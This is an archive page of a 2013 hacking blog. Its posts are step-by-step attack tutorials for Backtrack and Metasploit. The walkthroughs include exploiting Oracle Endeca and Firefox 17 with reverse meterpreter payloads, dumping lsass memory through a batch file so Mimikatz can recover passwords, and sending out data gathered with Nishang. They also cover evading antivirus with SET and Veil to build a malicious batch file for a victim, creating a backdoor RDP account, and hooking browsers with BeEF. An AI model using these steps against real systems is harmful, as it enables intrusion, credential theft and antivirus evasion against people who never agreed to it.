Thursday, August 29, 2013

Access backtrack from remote computer using ssh & vnc.

0 comments
If  you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.

How to configure ssh in Backtrack 5 r3?


(1)First we have to generate ssh key.So type following in terminal.

ssh-keygen

It will generate public/private rsa key pair.By default location of keys is /root/.ssh/id_rsa

(2)Now we will move this generated keys in ssh folder.

cd /etc/ssh
mkdir keys

(3)Now copy generated keys from /root/.ssh/id_rsa & paste into keys folder which we create in second step.

(4)Now type following command in terminal
 dpkg-reconfigure openssh-server


(5)Now we have to start ssh daemon ; so type following in terminal
service ssh start
 
(6)Now everything is setup ; you can use your ssh server via remote machine.
For windows you can also use putty like software.If you are on linux machine than type following command.
ssh -l "username" 192.168.56.1(i.p.)

ssh-solution-backtrack

Tuesday, August 27, 2013

Exploit Oracle Endeca Server with metasploit.

0 comments

This module exploits a command injection vulnerability on the Oracle  Endeca Server 7.4.0. The vulnerability exists on the createDataStore  method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).

First run ./msfupdate or git pull to update metasploit.

Now when you open metasploit & found error like this
[-]     /opt/msf/modules/exploits/windows/http/oracle_endeca_exec.rb: NameError uninitialized constant Msf::Exploit::Powershell .

Open oracle_endeca_exec.rb file in any editor.
Add this line require 'msf/core/exploit/powershell' after require 'msf/core'.
So it look like
require 'msf/core'
require 'msf/core/exploit/powershell'
Save it & open metasploit again.

Exploit target:

   Id  Name
   --  ----
   0   Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits

msf > use exploit/windows/http/oracle_endeca_exec
msf exploit(oracle_endeca_exec) > set rhost 192.168.56.101(victim`s i.p.)
rhost => 192.168.56.101
msf exploit(oracle_endeca_exec) > run

Exploit-Oracle-Endeca-Server

Sunday, August 25, 2013

How to get plain text source from shc compiled bash script?

1 comments
Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.

First we see how to compiled bash script to binary?


wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz

tar -xvzf shc-3.8.7.tgz

cd shc-3.8.7

make

./shc

You can see shc usage message.
shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] [-rvDTCAh] -f script

Now we have script which we want to convert in binary.

./shc -f /script_path

So now you can see that it will convert plain text bash source into binary which extension is  .sh.x.


How to retrieve plain text from binary?


The shc compiled binary decrypts and loads the script into memory when started right after we started the binary, just segfault it and retrieve our script from the core dump.


Core dumps are often used to  debug errors in Linux or UNIX programs. A core file is generated when an application program abnormally terminates due to bug, operating system security protection schema, or program simply try to write beyond the area of memory it has allocated.

By default most of linux distributions turn off core file creation.
So we need to turn on core file creation.

ulimit -c

If output is zero means that core file is not created.

Now we set core file size limit to 70000 byte

ulimit -c 70000

Now we start binary & segfault it right away.I used IP-Digger binary to get plain text from it.

./IP-Digger4.sh.x&  ( sleep 0.02 && kill -SIGSEGV $! )

 sleep 0.02 will give the binary enough time to start up and decrypt the original script. The variable $! contains the pid of the last background process started, so we can easily kill it with the segmentation fault signal SIGSEGV (same as kill -11 $!). 
+ segmentation fault (core dumped)  ./IP-Digger4.sh.x
cat core | strings >plain_text

shc-plain-text

Now open plain_text file which we created & find plain text source of bash script.I upload source code of ip-digger here .

But if your script is too large then adjust core file size.

Friday, August 23, 2013

Post exploitation & swaparoo backdoor.

0 comments
Today we are going to create valid RDP user in victim pc using two method.

(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you have to encode it. )

Now we use meterpreter script which create RDP useraccount for logon.
run getgui -u username -p password.

msf-post-exploitation

Now Useraccount has been created.You can use rdesktop command to connect with victim using created credentials.

rdesktop victim i.p.

Wednesday, August 21, 2013

Post exploitation using Nishang.

1 comments
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.

This framework is written by Nikhil Mittal who is also author of Kautilya framework.For more information you can visit his blog.

Today we will see some basic module from nishang framework for post exploitation.

This tutorial is about post exploitation so first get meterpreter shell using any metasploit method. If you are new than visit metasploit section of blog.

(1)Download nishang from here .
(2)Unzip it & put it in root directory.

meterpreter>shell
cd C:\\Users/victim
mkdir 123
exit

meterpreter>upload /root/nishang/ C:\\Users/victim/123

We upload all powershell script from our nishang folder to victim pc `s folder.


nishang-1

After upload we have to get shell.

meterpreter>shell
cd c://Windows\System32\WindowsPowerShell\v1.0


So now everything is set ; we execute our powershell script from our shell.

(1)First we use Information Gather module. It gather all informataion from victim pc & it has exifil option so gatherd information is directly uploaded to the pastebin;gmail.

So type following in our shell

powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Information_Gather.ps1 -exfil AIP_Of_Pastebin username password 1


nishang-1

Tuesday, August 20, 2013

Bypass AV using powershell method using batch file.

0 comments
In penetration testing first step is how we can bypass AV & make our payload FUD. Previously we saw that we can bypass AV using Veil.At that time we used python module.In veil there are four types of payload.C,C#,powershell and python. Today we use powershell module.

If you don`t aware about powershell ; then you can google it.It`s windows based scripting language like bash in linux.Most of AV cannot detect it.We use SET powershell module to bypass AV; you can also use veil module.

cd  /pentest/exploits/set/
./setoolkit

type 1 which is social engineering attack
After that type 10.

powershell-module

Then give your i.p. & port to connect reverse shell.

Now in figure you can see that it has been generated & stored in to /root/.set/reports/powershell . And we also start metasploit listener.If victim paste our generated payload in cmd then we can get meterpreter shell. But i think it`s hard to tell someone to copy something & paste into cmd. So we will create batch file of our payload.

Create Batch file of our Payload.


(1)open x86_powershell_injection.txt file from  /root/.set/reports/powershell.
(2)Add path of powershell in first line. For example your code is starting from powershell word just put C:\\windows/system32/windowspowershell/v1.0/ before it.
(3)If you want to hide text during execution put @echo off at start of script.
(4)copy all code from x86_powershell_injection.txt
(5)Create new file & paste code
(6)Save this file as .bat extension and send to victim

As soon as he open file we can get shell.

Friday, August 16, 2013

Mimikatz alpha to get clear text password via bat file without AV alert.

7 comments

Mimikatz is great tool to get cleat text password . it extract password from memory. If you want to use ; here is my previous tutorial . Also it include now in metasploit. But now most of Antivirus  detect it. So now we use another method to get clear text password using mimikatz alpha.

(1)It`s post exploitation method ;so first you have to get meterpreter session using metasploit. If you are new ; then visit metasploit section of blog. You also need admin access of box. So for that you can use bypassuac module of metasploit.

(2)First  download latest  mimikatz which contain alpha version of it from following link.
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.7z

Then download process dump from following link
http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

(3)Now make one batch file name it to procdump.bat . paste following code into batch file.

@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\dump_file.dmp 2>&1

(4)Now from meterpreter session upload  procdump.bat & downloaded  procdump.exe file to C:\windows\temp folder.

(5)Now go to shell from meterpreter & if you are not in temp directory change it to the C:\windows\temp
Now here what we do is create scheduled task.So type following command in shell.

at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat

mimikatz

Tuesday, August 13, 2013

Exploit for Firefox 17 in Windows XP sp3

2 comments
Recently Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography.Now exploit is available in metasploit. Use msfupdate to get it.


Exploit target:

   Id  Name
   --  ----
   0   Firefox 17 & Firefox 21 / Windows XP SP3


msf > use exploit/windows/browser/mozilla_firefox_onreadystatechange

msf exploit(mozilla_firefox_onreadystatechange) > set LHOST 180.215.222.190
LHOST => 180.215.222.190
msf exploit(mozilla_firefox_onreadystatechange) > set SRVHOST 180.215.222.190
SRVHOST => 180.215.222.190
msf exploit(mozilla_firefox_onreadystatechange) > set uripath /
uripath => /
msf exploit(mozilla_firefox_onreadystatechange) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mozilla_firefox_onreadystatechange) > run
[*] Exploit running as background job.

[*] Started reverse handler on 180.215.222.190:4444
[*] Using URL: http://180.215.222.190:8080/
[*] Server started.
msf exploit(mozilla_firefox_onreadystatechange) >

firefox-exploit

Sunday, August 11, 2013

Bypass AV using Veil In Backtrack.

10 comments
Today this blog complete exactly one year.Before one year i started journey in security world & still now it`s going well.Ok get to the point.Most of time it happened that our payload is detected by AV ;we can use encoder to encode our payload ;So it can not be detected by AV. Today we show how we can bypass AV using Veil. Veil is python based tool which create FUD payload.

How to Download & use ?

wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
chmod +x setup.sh
./setup.sh

It will download all required python package for generating payload.

Veil is officially supported in Kali linux ; But it`s python based tool so we can use it in any os which is able to execute python script. I used it in Backtrack 5.We have to make some change in generated veil.py file to get working in backtrack.
Open directory of veil & go to config and open veil.py.(In latest version of veil , open /etc/veil/settings.py) If you installed metasploit from binary package then Change  line of metasploit path to /opt/metasploit/apps/pro/msf3/ and save it.

Go to veil direcory & run
./Veil.py

  AV-bypass-using-veil 

Wednesday, August 7, 2013

Extract skype & firefox data after exploitation.

1 comments
Today we will see how can we extract skype username ; contacts details ;conversation;file transfer & also firefox history;cookies;google search from victim computer.

First of all it`s post  exploitation, So i don`t go deep in How to hack remote P.C.. if you want to learn than click here & read metasploit section of blog.So you have to hack remote computer using metasploit.

 I create simple payload ; encoded it so antivirus can not detect it.
msfcli

And then send link to victim , as soon as he download payload and execute it we get meterpreter shell.

meterpreter

Sunday, August 4, 2013

Extract email address from given domain.

2 comments
Yesterday i created simple script which extract email address from given Domain. We can gather email address from whois info; pgp key search ;domain name. With help of this script we can extract email address which are on the specified web page.In backtrack there is tool available which is uberharvester. It has many features ;  but for small website it takes too much time to extract information.But this script work fast for small website. Speed of script depends on loading time of website and number of web pages.

Script working in two mode.

(1)In first mode we have to supply sitemap of website, so script can crawl that webpage one by one & extract email address.
For example if your victim website is fakesite.com then go to http://xml-sitemaps.com/ & create sitemap & download it in text format and save it to same folder where script is located.

extract-email

Saturday, August 3, 2013

How to use Browser Exploitation Framework?

1 comments
The Browser Exploitation Framework (BeEF) is a penetration testing tool written in Ruby and designed to both showcase browser weaknesses as well as perform attacks both on and through the web browser. BeEF consists of a server application that manages the connected clients, known as “zombies”, and JavaScript “hooks” which run in the browser of target hosts.

Traditionally, the JavaScript hook is injected by the attacker into HTML code either through an attack such as Cross Site Scripting (XSS) or SQL Injection. Once the hook is processed by the browser, it beacons back home to the BeEF server, and will process JavaScript based commands sent from the BeEF server to the client.

The commands sent to the browser are triggered through modules running within the BeEF server. These modules send commands that do everything from fingerprinting browsers and plug-ins to allowing the attacker to proxy web traffic through the browser. Additional modules exist to perform tasks such as network scanning, browser keystroke logging, and cross protocol exploitation where HTTP requests can be sent to non-HTTP services with exploit payloads that will execute and return shells back to an attacker.

In backtrack Beef  has been installed.But it`s not latest version , so you have to clone git repository for latest installation.

git clone https://github.com/beefproject/beef.git

cd beef

gem install bundler

bundle install

./beef

beef

UA-35960349-1